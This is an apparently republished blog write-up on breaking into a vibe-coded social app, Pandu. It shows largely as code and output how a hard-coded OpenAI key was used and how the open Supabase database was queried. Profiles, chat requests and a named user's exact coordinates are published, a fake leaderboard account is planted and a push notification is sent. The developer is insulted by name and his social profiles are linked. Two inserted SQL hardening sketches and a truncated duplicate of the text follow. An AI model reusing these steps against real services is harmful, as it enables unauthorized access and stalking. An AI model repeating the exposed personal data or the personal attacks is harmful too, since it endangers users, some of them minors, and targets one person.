"Just Fucking Ship IT" (Or: On Vibecoding)

Jul 9, 2025 - 18:15

Preface

I have minimal experience with exploitation or security research; some techniques employed in this write-up are almost certainly suboptimal. This is not a tutorial; do not treat it as such. Sensitive information has been censored as best as possible.

Introduction

Earlier in the year I attended a hackathon organized by my university's IEEE branch. My team and I managed to hack together a pretty decent submission, and for our efforts, we were rewarded with second place. Among the submissions, a one Mentora piqued my interest. Mentora marketed itself as an "AI tutor", seeking to gamify quizzes and provide personalized lesson plans using, you guessed it, large language models.

Interested, I began to explore the "How we built it" section of the Devpost. React Native, Supabase, and OpenAI integration. Yup! This reeks of vibe coder slop. Unfortunately, Mentora never seemed to see the light of day. Luckily, our hero didn't stop there, and this time he's breaking into the social media market. Enter: Pandu.

What even is Pandu?

Much like Mentora, Pandu is a pretty generic take on an existing genre but with more AI slop. Disappointingly, there is yet to be an Android release of Pandu, and given that I don't own any Apple devices, investigating this might be a little rough.

First Steps

Apparently, Apple's IPA format is encrypted, meaning that blindly pulling files from a server and expecting to be able to read them isn't going to work. Luckily, someone has managed to automate this process of decrypting these bundles and has even been so kind as to expose the tooling behind a Telegram bot.

After acquiring the decrypted IPA, I simply suffixed the file with .zip and extracted it:

unzip pandu_ipa_v103.ipa.zip

The archive yielded a Payload/ folder, with the following structure:

The main file of interest here is the main.jsbundle, which appears to be a JavaScript bundle compiled with Hermes. After a quick pass with hermes-dec, I was left with a mostly readable blob of pseudocode:

python hbc_decompiler.py ./Payload/Pandu.app/main.jsbundle pandu_decomp.js

Initial Investigation

I began my search by looking for very low-hanging fruit. Surely an app published on the App Store wouldn't expose an OpenAI key, right?

grep "'sk-" pandu_decomp.js
r11 = 'sk-proj-*************************************************';

WHAT? There. Is. No. Way.

curl "https://api.openai.com/v1/responses" \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer sk-proj-********" \
    -s \
    -d '{
        "model": "gpt-4.1",
        "input": "Write me a haiku about why it is not a great idea to hard-code OpenAI API keys into client-facing applications."
    }' | jq -r '.output[0].content[0].text'
Secrets in plain sight—  
Exposed keys invite misuse,  
Guard doors, don’t paint signs.

So it turns out that all the fancy LLM integration is handled client-side, with the user's device issuing the OpenAI API queries and forwarding the output to the "backend" (if you can even call it that, I'll get to this later).

Now that we know that LLM queries are handled client-side, it shouldn't be too difficult to pull out the system prompt.

An LLM prompt isn't exactly "valuable information," and "prompt engineering" is most definitely not a skill. Nonetheless, I'm expecting this to be quite funny.

"You are a Gen Z App, You are Pandu,you are helping a user spark conversations with a new user, you are not cringe and you are not too forward, be human-like. You generate 1 short, trendy, and fun conversation starter. It should be under 100 characters and should not be unfinished. It should be tailored to the user's vibe or profile info. Keep it casual or playful and really gen z use slangs and emojis. No Quotation mark"

I wonder what prompted him to tell the model not to be cringe.

Supabase

If you aren't familiar, Supabase is a Backend-as-a-Service, providing CRUD-accessible endpoints, a database, storage buckets, authentication, and even real-time communication. The upside of something like this is that you don't need to understand the complexities that come with backend development in order to build something that "just works". However, you'll later come to see that this is also a hidden downside, as some people shouldn't be permitted within 10 feet of a backend.

Taking the place of a standard database, Supabase expects the client to talk directly to the database. Now, you might be thinking to yourself: "isn't that a horrible idea?" and to your question, I'll reply "yes." The assumption is that the person in charge of configuring Supabase will correctly dish out permissions such that end-users cannot simply read/write to arbitrary relations, but as you'll soon see, this is not always the case.

With the decompiled pseudocode in hand, it was as simple as grepping for a few keywords:

function(...) {
    ...
    r1 = {'storage': null, 'autoRefreshToken': true, 'persistSession': true, 'detectSessionInUrl': false};
    r3 = r3.default;
    r1['storage'] = r3;
    r4['auth'] = r1;
    r3 = 'https://XXXXXXXXXXXX.supabase.co'; // supabaseUrl
    r1 = 'eyJh.XXXXXXXX.XXXXXXXXX';          // supabaseAnonKey
    r1 = r5.bind(r0)(r3, r1, r4);            // r1 = createClient(supabaseUrl, supabaseAnonKey, r4);
    r2['supabase'] = r1;
    r1 = r1.auth;
    r1 = r1.admin;
    r2['adminAuthClient'] = r1;
    return r0;
};

Now that we have the Supabase information, it's time to go hunting for relations that might be useful. After some investigation, it appears that all Supabase queries follow roughly the same pattern in the pseudocode:

r6 = r4.supabase; // supabase.from('user_wallet')...
r4 = r6.from;
r13 = 'user_wallet';
...

With this in mind, we can write some cheeky Python that'll help us filter through this *checks notes* 1.5M LoC blob.

I know that this could be accomplished with a regex, but I'm stubborn and refuse to change.

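# find_relations.py: list the relation names passed to supabase.from(...)
# in the decompiled bundle.
relations: list[str] = []

with open("pandu_decomp.js") as file:
    lines = file.readlines()

# Each query spans three consecutive lines of pseudocode:
#   rX = rY.supabase;
#   rX = rY.from;
#   rX = '<relation>';
# Stop two lines early so the look-ahead never runs past the end of the file.
for line_num in range(len(lines) - 2):
    if "supabase" not in lines[line_num]:
        continue

    if "from" not in lines[line_num + 1]:
        continue

    target_line = lines[line_num + 2]

    if "'" in target_line:
        # The relation name is the first single-quoted string on the line.
        relation = target_line.split("'")[1]

        if relation not in relations:
            relations.append(relation)
            print(relation)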

And let's run it!

python find_relations.py

profiles
user_wallet
user_progression
engagement_scores
user_interests
user_locations
user_wallets
flaggame
user_friendships
friend_requests
blocked_users
reports
game_requests
guessmoji_game
rizzme_game
tic_tac_toe_game
truthordare_game
user_views
user_likes
game_ideas
chat_requests

These relation names are... interesting to say the least.

Let's poke around and see what we have access to. A quick select from the profiles relation doesn't seem like a terrible idea ;).

import { createClient } from '@supabase/supabase-js';

const supabaseUrl = 'https://XXXXXXXXXXXX.supabase.co';
const supabaseAnonKey = 'eyJh.XXXXXXXX.XXXXXXXXX';

const supabase = createClient(supabaseUrl, supabaseAnonKey, {});

const result = await supabase
    .from("profiles")
    .select()
    .limit(1)

console.log(result["data"])

[
  {
    "id": "3c0f201b-6dee-4858-85d4-ced865223027",
    "updated_at": "2025-06-24T02:33:22.3+00:00",
    "nickname": null,
    "age": null,
    "birth_date": null,
    "gender": null,
    "user_id": null,
    "bio": null,
    "avatar_url": [ null ],
    "expo_push_token": null,
    "created_at": null,
    "username": null,
    "full_name": null,
    "completed_onboarding": false,
    "hasActiveSubscription": false,
    "engagement_score": 0,
    "online": true,
    "verified": false
  }
]

Well, this is odd. I'm assuming this is a blank account that was created during testing? Either way, we now have a list of fields which is exactly what I was looking for.

let brokenProfiles = await supabase
    .from("profiles")
    .select()
    .is("username", null)

let nonBrokenProfiles = await supabase
    .from("profiles")
    .select()
    .not("username", "is", null)

let suckers = await supabase
    .from("profiles")
    .select()
    .eq("hasActiveSubscription", true)

console.log("broken profiles:", brokenProfiles["data"].length);
console.log("non-broken profiles:", nonBrokenProfiles["data"].length);
console.log("suckers:", suckers["data"].length);

broken profiles: 1286
non-broken profiles: 9427
suckers: 146

Weird. I'm not quite sure what this indicates, but those numbers are certainly interesting.

(Can you believe that nearly 10k people were dumb enough to sign up for this app?)

Expo

I've gone ahead and had my girlfriend create an account on her iPhone; this way I can explore a little more without having to worry about stepping on anyone's toes.

let result = await supabase
    .from("profiles")
    .select()
    .eq("username", "zoe604385")

{
    "id": "67cf4fd4-90b0-4f90-9103-1e53dca44787",
    "updated_at": "2025-07-07T02:05:50.224+00:00",
    "nickname": "zoe",
    "age": 25,
    "birth_date": "2000-01-01",
    "gender": "other",
    "user_id": null,
    "bio": "i am passionate about gooning",
    "avatar_url": [ "1751232382134_0.jpg" ],
    "expo_push_token": "ExponentPushToken[**********]",
    "created_at": "2025-06-29T21:24:34.481+00:00",
    "username": "zoe604385",
    "full_name": null,
    "completed_onboarding": true,
    "hasActiveSubscription": false,
    "engagement_score": 2.8,
    "online": false,
    "verified": false
}

There are a few things here that are noteworthy, but let's investigate the expo_push_token field. It appears that any time a notification is to be sent out, it is issued by the client, with the following steps being taken:

  1. Client queries the profiles relation for the recipient's Expo push token
  2. Client issues POST request to Expo containing the notification content and the recipient's token
  3. Recipient queries Expo for pending notifications
  4. Recipient displays notification

Decompiled Pseudocode for Sending Notifications

r10 = r6;
r8 = global;
r6 = r8.HermesInternal;
r9 = r6.concat;
r7 = '';
r6 = ' won the Flag Game! 🏆🏳️';
r12 = r9.bind(r7)(r10, r6);
r9 = r8.fetch;
r7 = {};
r6 = 'POST';
r7['method'] = r6;
r6 = {};
r10 = 'application/json';
r6['Content-Type'] = r10;
r7['headers'] = r6;
r11 = r8.JSON;
r10 = r11.stringify;
r6 = {'to': null, 'title': 'Game Over 💔', 'body': null, 'data': null, 'sound': 'default', 'priority': 'high', 'channelId': 'default'};
r15 = r15.expo_push_token;
r6['to'] = r15;
r6['body'] = r12;
r12 = {'type': 'game_win', 'gameId': null, 'screen': 'FlagGame'};
r14 = _closure2_slot3;
r12['gameId'] = r14;
r12['winner'] = r13;
r6['data'] = r12;
r6 = r10.bind(r11)(r6);
r7['body'] = r6;
r6 = 'https://exp.host/--/api/v2/push/send';
r6 = r9.bind(r1)(r6, r7);

Under no circumstances should these Expo tokens be exposed to clients; however, the very architecture of this application relies on that being the case. With that in mind, I'm quite sure that it's possible to issue arbitrary push notifications to any user. According to the official Expo Docs, all we need to do is issue the following POST request:

curl -H "Content-Type: application/json" -X POST "https://exp.host/--/api/v2/push/send" -d '{
  "to": "ExponentPushToken[**********]",
  "title":"",
  "body": "<body>"
}'

I wonder if it worked...

[Image: https://coal.sh/assets/pandu_expo.jpg]

Hall of Fame

The main feature that sets Pandu apart from other social media platforms is its integration of games. Despite being poorly executed and far from original, there seems to be a group of people competing for spot #1 on the in-game leaderboard. I don't quite like Pandu, but I definitely am competitive by nature; let's see what we can do.

The rankings seem to be calculated client-side by simply querying the user_progression relation for the top 20 users sorted by total win count.

r1 = new Array(2);
r1[0] = r13;
r19 = _closure1_slot5;
r20 = r19.supabase;
r19 = r20.from;
r21 = 'user_progression';
r22 = r19.bind(r20)(r21);
r20 = r22.select;
r19 = 'id, username, nickname, wins, level, profiles!inner (avatar_url,age)';
r24 = r20.bind(r22)(r19);
r22 = r24.order;
r19 = {};
r19['ascending'] = r3;
r20 = 'wins';
r24 = r22.bind(r24)(r20, r19);
r22 = r24.limit;
r19 = 20;
r19 = r22.bind(r24)(r19);
r1[1] = r19;
r1 = r7.bind(r18)(r1);
SaveGenerator(address=309);

Cleaned-up Rankings Query

let leaderboard = await supabase
    .from("user_progression")
    .select("id, username, nickname, wins, level, profiles!inner (avatar_url,age)")
    .order("wins", { ascending: false })
    .limit(20);

Presumably, all we should have to do is create a profile and propagate those aforementioned fields such that we satisfy the query. Additionally, we need to set the user_id field to satisfy the foreign key relationship between user_progression and profiles.

First, let's create the account:

const auth = await supabase.auth.signUp(
    {
        email: "john@fortnite.com",
        password: "fuckyounerd",
    }
);

const userId = auth.data.user.id;

And now we can propagate the fields of the relations:

await supabase
    .from("user_progression")
    .upsert(
        {
            id: userId,
            user_id: userId,
            username: "john_fortnite_xx",
            nickname: "john xx fortnite",
            wins: 6969,
            level: 1000000,
        }
    );

await supabase
    .from("profiles")
    .upsert(
        {
            id: userId,
            user_id: userId,
            age: 100,
            avatar_url: ["totallyrealimage.png"]
        }
    );

And voilà! :)

[Image: https://coal.sh/assets/pandu_leaderboard.jpg]
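
An added example, not part of the original post and not Pandu's own code: a Postgres migration sketch for the two client-trust problems above, the client-readable expo_push_token column and the client-writable wins and level columns. It assumes the column names visible in the query results on this page, that profiles.id and user_progression.user_id hold the Supabase auth user id, and that wins and level have column defaults; the policy names are made up.

```sql
-- Constructed hardening sketch. Table and column names come from the query
-- results on this page; the key columns and defaults are assumptions.
begin;

-- profiles: other users can read only the listed columns. expo_push_token,
-- birth_date and everything else not listed is unreadable through the API.
alter table public.profiles enable row level security;

revoke select, insert, update, delete on public.profiles from anon, authenticated;

grant select (id, user_id, username, nickname, age, bio, avatar_url, online, verified)
  on public.profiles to authenticated;
-- A device may still store its own push token; it cannot read anyone's.
grant insert (id, username, nickname, age, birth_date, gender, bio, avatar_url, expo_push_token)
  on public.profiles to authenticated;
grant update (nickname, bio, avatar_url, online, expo_push_token)
  on public.profiles to authenticated;
-- Columns absent from the lists above (verified, hasActiveSubscription,
-- engagement_score, ...) can now be written only by server-side code.

create policy "signed-in users read profiles"
  on public.profiles for select to authenticated
  using (true);

create policy "insert own profile"
  on public.profiles for insert to authenticated
  with check ((select auth.uid()) = id);

create policy "update own profile"
  on public.profiles for update to authenticated
  using ((select auth.uid()) = id)
  with check ((select auth.uid()) = id);

-- user_progression: a client may create its own row and rename itself,
-- but wins and level are never client-writable.
alter table public.user_progression enable row level security;

revoke insert, update, delete on public.user_progression from anon, authenticated;

grant insert (id, user_id, username, nickname)
  on public.user_progression to authenticated;
grant update (nickname)
  on public.user_progression to authenticated;

create policy "signed-in users read progression"
  on public.user_progression for select to authenticated
  using (true);

create policy "insert own progression row"
  on public.user_progression for insert to authenticated
  with check ((select auth.uid()) = user_id);

create policy "update own progression row"
  on public.user_progression for update to authenticated
  using ((select auth.uid()) = user_id)
  with check ((select auth.uid()) = user_id);

commit;
```

With column-level SELECT grants, a select() without an explicit column list fails with a permission error, so client queries have to name their columns. Sending notifications and recording wins then have to move to server-side code running with the service role.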

Chats

Moving on to something a bit more serious, the privacy implications of using software built by someone whose productive output is directly tied to the uptime of Cursor (https://cursor.com/) are absolutely horrendous. Despite his apparent lack of competence, it appears that he has (miraculously) managed to implement user chat sessions in a pretty solid way. By piggybacking off of Supabase's authentication and StreamChat's (https://getstream.io/chat/tour/) real-time communication API, he has completely avoided doing any heavy lifting himself. Smart.

With this in mind, we should look for the tiny portion of this stack that he is responsible for creating. Before a chat session is initialized, a "chat request" is first sent out to a user, after which they can choose to either accept or reject the invitation. Checking the table of relations we mined earlier, the chat_requests relation seems like it might be relevant. Let's investigate.

await supabase
    .from("chat_requests")
    .select()
    .limit(1);

[
  {
    "id": "4a9793fd-2a12-4142-baa1-9552cf5df39c",
    "created_at": "2025-04-17T01:02:26.087669+00:00",
    "sender_id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6",
    "sender_name": "Christian",
    "sender_avatar": "1744702431504.jpg",
    "receiver_id": "42a26d91-8ea3-492c-9038-ac1b79633e53",
    "receiver_name": "Christopher",
    "receiver_avatar": "1",
    "message": "Yo wassup",
    "status": "accepted"
  }
]

Yup! Our suspicion is confirmed. Every single chat request is public! This is truly a nightmare. Even worse, I seemingly have read/write access to this table, meaning it's feasible to send chat requests with arbitrary messages on behalf of other users.

User Location

Okay, I think it's time we stop beating around the bush. I'm sure if you've been an attentive reader you will have noticed the user_locations relation from earlier. The in-app use case of this appears to be matching users up with others who are geographically close to them. While I understand the justification for a feature like this, the execution here is dangerously flawed. With a single select I am able to pull the live geographic location of any user on the app. You heard me right. This is not the future of social media, it's a sexual predator's wet dream.

await supabase
    .from("user_locations")
    .select()
    .eq("id", "0f982e76-6479-4f7d-a995-b26a6d5ee5b6")

[
  {
    "created_at": "2025-03-17T16:15:45.062944+00:00",
    "latitude": 42.6897712735434,
    "longitude": -73.8244290461434,
    "country": "United States",
    "state": "NY",
    "last_updated": "2025-04-15T07:30:23.973+00:00",
    "city": "Albany",
    "id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6",
    "user_id": "0f982e76-6479-4f7d-a995-b26a6d5ee5b6"
  }
]

If you need even more compelling evidence that this app is downright dangerous, take a quick look at this histogram of profile count by age:

[Image: https://coal.sh/assets/pandu_age_distribution.png]

Nearly a thousand children under the age of 18 with their live location, photo, and age being beamed up to a database that's left wide open. Criminal.
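
An added example, not part of the original post and not Pandu's own code: row-level security for the chat_requests and user_locations relations shown above, so a row is visible only to its parties or its owner, with proximity matching moved into a database function that returns a coarse distance instead of coordinates. It assumes the column names in the results above, double precision coordinates, and a 'pending' initial status; nearby_users and the policy names are hypothetical.

```sql
-- Constructed hardening sketch. Table and column names come from the query
-- results on this page; everything else is an assumption.
begin;

-- chat_requests: visible to the two parties only.
alter table public.chat_requests enable row level security;

create policy "parties read their chat requests"
  on public.chat_requests for select to authenticated
  using ((select auth.uid()) in (sender_id, receiver_id));

-- A request can be created only under the caller's own id.
-- 'pending' is an assumed initial status; the page only shows 'accepted'.
create policy "send chat request as yourself"
  on public.chat_requests for insert to authenticated
  with check ((select auth.uid()) = sender_id and status = 'pending');

-- Only the receiver may answer, and only by changing status.
create policy "receiver answers chat request"
  on public.chat_requests for update to authenticated
  using ((select auth.uid()) = receiver_id)
  with check ((select auth.uid()) = receiver_id);

revoke update, delete on public.chat_requests from anon, authenticated;
grant update (status) on public.chat_requests to authenticated;

-- user_locations: a user reads and writes only their own row.
alter table public.user_locations enable row level security;

create policy "read own location"
  on public.user_locations for select to authenticated
  using ((select auth.uid()) = user_id);

create policy "insert own location"
  on public.user_locations for insert to authenticated
  with check ((select auth.uid()) = user_id);

create policy "update own location"
  on public.user_locations for update to authenticated
  using ((select auth.uid()) = user_id)
  with check ((select auth.uid()) = user_id);

-- Proximity matching runs inside the database with the definer's rights and
-- returns a distance rounded up to the next 10 km, never latitude/longitude.
create function public.nearby_users(max_km double precision default 50)
returns table (matched_user_id uuid, distance_bucket_km integer)
language sql
stable
security definer
set search_path = ''
as $$
  select other.user_id,
         (greatest(1, ceil(d.km / 10.0)) * 10)::integer
  from public.user_locations as me
  join public.user_locations as other
    on other.user_id <> me.user_id
  cross join lateral (
    -- Haversine great-circle distance in km (Earth radius 6371 km).
    select 6371 * 2 * asin(least(1.0, sqrt(
             power(sin(radians(other.latitude - me.latitude) / 2), 2)
             + cos(radians(me.latitude)) * cos(radians(other.latitude))
               * power(sin(radians(other.longitude - me.longitude) / 2), 2)
           ))) as km
  ) as d
  where me.user_id = (select auth.uid())
    and d.km <= least(max_km, 100);  -- hard cap on the search radius
$$;

revoke execute on function public.nearby_users(double precision) from public, anon;
grant execute on function public.nearby_users(double precision) to authenticated;

commit;
```

Bucketed distances reduce precision but do not stop repeated probing, so rate limiting calls to the function is a separate control. sender_name and sender_avatar are still client-supplied in this sketch and would need to be filled in server-side to be trustworthy.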

Enter Christian

[Image: https://coal.sh/assets/christian_porn_bad.png]

Christian is the "mastermind" behind this technological shitshow and its parent company, Lunexis (https://www.linkedin.com/company/lunexis-technologies/). As you've already seen, this man needs no introduction.

[Image: https://coal.sh/assets/pandu_eight.png]

At first, I was wondering how he managed to even publish something like this, but I'm starting to think that Apple just got tired of rejecting it over and over.

Takeaway

"Vibe coding" isn't just a cheap shortcut, it's reckless and dangerous. Christian's incompetence is jeopardizing the privacy of hundreds of people, all while he lines his pockets. What he is doing is illegal, perverse, and downright disgusting.

Think I'm exaggerating? I was planning on doing some math to estimate his MRR, but it looks like he's already gone ahead and bragged about it on Twitter (https://x.com/chrismonfiston/).

[Image: https://coal.sh/assets/christian_mrr.png]

Earlier in this write-up I managed to identify 146 active subscribers. Assuming this figure is accurate and his revenue-per-subscription has stayed constant, that leaves us with an estimated MRR just north of $2,500. He is making serious money and has absolutely no clue what he's doing!

Call to Action

Calling this platform harmful is not an understatement. I am urging you to stop supporting this creator, report the app immediately, and get friends and loved ones off of this app as swiftly as possible.
</div>                        </div>
                                            <div class="d-flex flex-row-reverse mt-4">
                            <a href="https://coal.sh/blog/pandu_bad" class="btn btn-md btn-custom" target="_blank" rel="nofollow">
                                Read More                                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="m-l-5" viewBox="0 0 16 16">
                                    <path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"/>
                                </svg>
                            </a>
                        </div>
                                        <div class="d-flex flex-row post-tags align-items-center mt-5">
                                            </div>

                    <div id="postNextPrevContainer" class="post-next-prev mt-5"></div>

                                            <div class="row">
                            <div class="col-sm-12">
                                <div class="emoji-reactions-container noselect">
                                    <h4 class="title-reactions">What's Your Reaction?</h4>
                                    <div id="reactions_result">
                                        <div class="emoji-reactions">
    
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'like');">
        <img src="https://blacknews.news/assets/img/reactions/like.png" alt="Like" class="emoji">
        <span class="text">Like</span>
        <span class="vote">0</span>
    </div>
</div>
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'dislike');">
        <img src="https://blacknews.news/assets/img/reactions/dislike.png" alt="Dislike" class="emoji">
        <span class="text">Dislike</span>
        <span class="vote">0</span>
    </div>
</div>
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'love');">
        <img src="https://blacknews.news/assets/img/reactions/love.png" alt="Love" class="emoji">
        <span class="text">Love</span>
        <span class="vote">0</span>
    </div>
</div>
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'funny');">
        <img src="https://blacknews.news/assets/img/reactions/funny.png" alt="Funny" class="emoji">
        <span class="text">Funny</span>
        <span class="vote">0</span>
    </div>
</div>
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'angry');">
        <img src="https://blacknews.news/assets/img/reactions/angry.png" alt="Angry" class="emoji">
        <span class="text">Angry</span>
        <span class="vote">0</span>
    </div>
</div>
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'sad');">
        <img src="https://blacknews.news/assets/img/reactions/sad.png" alt="Sad" class="emoji">
        <span class="text">Sad</span>
        <span class="vote">0</span>
    </div>
</div>
<div class="reaction-container">
    <div class="reaction" onclick="addReaction('9185', 'wow');">
        <img src="https://blacknews.news/assets/img/reactions/wow.png" alt="Wow" class="emoji">
        <span class="text">Wow</span>
        <span class="vote">0</span>
    </div>
</div></div>                                    </div>
                                </div>
                            </div>
                        </div>
                                            <div class="d-flex about-author">
                            <div class="flex-shrink-0">
                                <a href="https://blacknews.news/profile/admin" class="author-link">
                                    <img src="https://blacknews.news/assets/img/user.png" alt="admin" class="img-fluid img-author" width="110" height="110">
                                </a>
                            </div>
                            <div class="flex-grow-1 ms-3">
                                <strong class="username"><a href="https://blacknews.news/profile/admin"> admin </a></strong>
                                                                    <div class="social">
                                        <ul class="profile-social-links">
                                                                                            <li><a href="https://blacknews.news/rss/author/admin"><i class="icon-rss"></i></a></li>
                                                                                    </ul>
                                    </div>
                                                            </div>
                        </div>
                                    </div>
            </div>
        </div>
    </div>
</section>
<script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","url":"https://blacknews.news","logo":{"@type":"ImageObject","width":600,"height":60,"url":"https://blacknews.news/assets/img/logo.svg"}}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"WebSite","url":"https://blacknews.news","potentialAction":{"@type":"SearchAction","target":"https://blacknews.news/search?q={search_term_string}","query-input":"required name=search_term_string"}}</script><script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://blacknews.news/just-fucking-ship-it-or-on-vibecoding"},"headline":""Just Fucking Ship IT" (Or: On Vibecoding)","name":""Just Fucking Ship IT" (Or: On Vibecoding)","articleBody":"Preface\nI have minimal experience with exploitation or security research- some techniques employed in this write-up are almost certainly suboptimal. This is not a tutorial, do not treat it as such. Sensitive information has been censored as best as possible.\nIntroduction\nEarlier in the year I attended a hackathon organized by my university's IEEE branch. My team and I managed to hack together a pretty decent submission, and for our efforts, we were rewarded with second place. Among the submissions, a one Mentora piqued my interest. Mentora marketed itself as an "AI tutor", seeking to gamify quizzes and provide personalized lesson plans using, you guessed it, large language models.\nInterested, I began to explore the "How we built it" section of the Devpost. React Native, Supabase, and OpenAI integration. Yup! This reeks of vibe coder slop. Unfortunately, Mentora never seemed to see the light of day. Luckily, our hero didn't stop there, and this time he's breaking into the social media market. Enter: Pandu.\nWhat even is Pandu?\nMuch like Mentora, Pandu is a pretty generic take on an existing genre but with more AI slop. 
Disappointingly, there is yet to be an Android release of Pandu, and given that I don't own any Apple devices, investigating this might be a little rough.\nFirst Steps\nApparently, Apple's IPA format is encrypted, meaning that blindly pulling files from a server and expecting to be able to read them isn't going to work. Luckily, someone has managed to automate this process of decrypting these bundles and has even been so kind as to expose the tooling behind a Telegram bot.\n\nAfter acquiring the decrypted IPA, I simply suffixed the file with .zip and extracted it:\nunzip pandu_ipa_v103.ipa.zip\n\nThe archive yielded a Payload/ folder, with the following structure:\n\nThe main file of interest here is the main.jsbundle, which appears to be a JavaScript bundle compiled with Hermes. After a quick pass with hermes-dec, I was left with a mostly readable blob of pseudocode:\npython hbc_decompiler.py ./Payload/Pandu.app/main.jsbundle pandu_decomp.js\n\n\nInitial Investigation\nI began my search by looking for very low-hanging fruit. Surely an app published on the App Store wouldn't expose an OpenAI key, right?\ngrep "'sk-" pandu_decomp.js\n\nr11 = 'sk-proj-*************************************************';\n\nWHAT? There. Is. No. 
Way.\ncurl "https://api.openai.com/v1/responses" \\\n    -H "Content-Type: application/json" \\\n    -H "Authorization: Bearer sk-proj-********" \\\n    -s \\\n    -d '{\n        "model": "gpt-4.1",\n        "input": "Write me a haiku about why it is not a great idea to hard-code OpenAI API keys into client-facing applications."\n    }' | jq -r '.output[0].content[0].text'\n\nSecrets in plain sight—  \nExposed keys invite misuse,  \nGuard doors, don’t paint signs.\n\nSo it turns out that all the fancy LLM integration is handled client-side, with the users' device issuing the OpenAI API queries and forwarding the output to the "backend" (if you can even call it that, I'll get to this later).\nNow that we know that LLM queries are handled client-side, it shouldn't be too difficult to pull out the system prompt.\n\nAn LLM prompt isn't exactly "valuable information," and "prompt engineering" is most definitely not a skill- Nonetheless I'm expecting this to be quite funny.\n\n"You are a Gen Z App, You are Pandu,you are helping a user spark conversations with a new user, you are not cringe and you are not too forward, be human-like. You generate 1 short, trendy, and fun conversation starter. It should be under 100 characters and should not be unfinished. It should be tailored to the user's vibe or profile info. Keep it casual or playful and really gen z use slangs and emojis. No Quotation mark"\nI wonder what prompted him to tell the model not to be cringe.\nSupabase\nIf you aren't familiar, Supabase is a Backend-as-a-Service, providing CRUD-accessible endpoints, a database, storage buckets, authentication, and even real-time communication. The upside of something like this is that you don't need to understand the complexities that come with backend development in order to build something that "just works". 
However, you'll later come to see that this is also a hidden downside, as some people shouldn't be permitted within 10 feet of a backend.\nTaking the place of a standard database, Supabase expects the client to talk directly to the database- now, you might be thinking to yourself: "isn't that a horrible idea?" and to your question, I'll reply "yes." The assumption is that the person in charge of configuring Supabase will correctly dish out permissions such that end-users cannot simply read/write to arbitrary relations, but as you'll soon see, this is not always the case.\nWith the decompiled pseudocode in hand, it was as simple as grepping for a few keywords:\nfunction(...) {\n    ...\n    r1 = {'storage': null, 'autoRefreshToken': true, 'persistSession': true, 'detectSessionInUrl': false};\n    r3 = r3.default;\n    r1['storage'] = r3;\n    r4['auth'] = r1;\n    r3 = 'https://XXXXXXXXXXXX.supabase.co'; // supabaseUrl\n    r1 = 'eyJh.XXXXXXXX.XXXXXXXXX';          // supabaseAnonKey\n    r1 = r5.bind(r0)(r3, r1, r4);            // r1 = createClient(supabaseUrl, supabaseAnonKey, r4);\n    r2['supabase'] = r1;\n    r1 = r1.auth;\n    r1 = r1.admin;\n    r2['adminAuthClient'] = r1;\n    return r0;\n};\n\nNow that we have the Supabase information, it's time to go hunting for relations that might be useful. 
After some investigation, it appears that all Supabase queries follow roughly the same pattern in the pseudocode:\nr6 = r4.supabase; // supabase.from('user_wallet')...\nr4 = r6.from;\nr13 = 'user_wallet';\n...\n\nWith this in mind, we can write some cheeky Python that'll help us filter through this checks notes 1.5M LoC blob.\n\nI know that this could be accomplished with a regex, but I'm stubborn and refuse to change\n\nrelations: list[str] = []\n\nwith open("pandu_decomp.js") as file:\n    lines = file.readlines()\n\n    for line_num, line in enumerate(lines):\n        if "supabase" not in line:\n            continue\n\n        if "from" not in lines[line_num + 1] or "":\n            continue\n\n        target_line = lines[line_num + 2] or ""\n\n        if "'" in target_line:\n            target_line_parts = target_line.split("'")\n            relation = target_line_parts[1]\n\n            if relation not in relations:\n                relations.append(relation)\n                print(relation)\n\nAnd let's run it!\npython find_relations.py\n\nprofiles\nuser_wallet\nuser_progression\nengagement_scores\nuser_interests\nuser_locations\nuser_wallets\nflaggame\nuser_friendships\nfriend_requests\nblocked_users\nreports\ngame_requests\nguessmoji_game\nrizzme_game\ntic_tac_toe_game\ntruthordare_game\nuser_views\nuser_likes\ngame_ideas\nchat_requests\n\nThese relation names are... 
interesting to say the least.\nLet's poke around and see what we have access to, a quick select from the profiles relation doesn't seem like a terrible idea ;).\nimport { createClient } from '@supabase/supabase-js';\n\nconst supabaseUrl = 'https://XXXXXXXXXXXX.supabase.co';\nconst supabaseAnonKey = 'eyJh.XXXXXXXX.XXXXXXXXX';\n\nconst supabase = createClient(supabaseUrl, supabaseAnonKey, {});\n\nconst result = await supabase\n    .from("profiles")\n    .select()\n    .limit(1)\n\nconsole.log(result["data"])\n\n[\n  {\n    "id": "3c0f201b-6dee-4858-85d4-ced865223027",\n    "updated_at": "2025-06-24T02:33:22.3+00:00",\n    "nickname": null,\n    "age": null,\n    "birth_date": null,\n    "gender": null,\n    "user_id": null,\n    "bio": null,\n    "avatar_url": [ null ],\n    "expo_push_token": null,\n    "created_at": null,\n    "username": null,\n    "full_name": null,\n    "completed_onboarding": false,\n    "hasActiveSubscription": false,\n    "engagement_score": 0,\n    "online": true,\n    "verified": false\n  }\n]\n\nWell, this is odd. I'm assuming this is a blank account that was created during testing? Either way, we now have a list of fields which is exactly what I was looking for.\nlet brokenProfiles = await supabase\n    .from("profiles")\n    .select()\n    .is("username", null)\n\nlet nonBrokenProfiles = await supabase\n    .from("profiles")\n    .select()\n    .not("username", "is", null)\n\nlet suckers = await supabase\n    .from("profiles")\n    .select()\n    .eq("hasActiveSubscription", true)\n\nconsole.log("broken profiles:", brokenProfiles["data"].length);\nconsole.log("non-broken profiles:", nonBrokenProfiles["data"].length);\nconsole.log("suckers:", suckers["data"].length);\n\nbroken profiles: 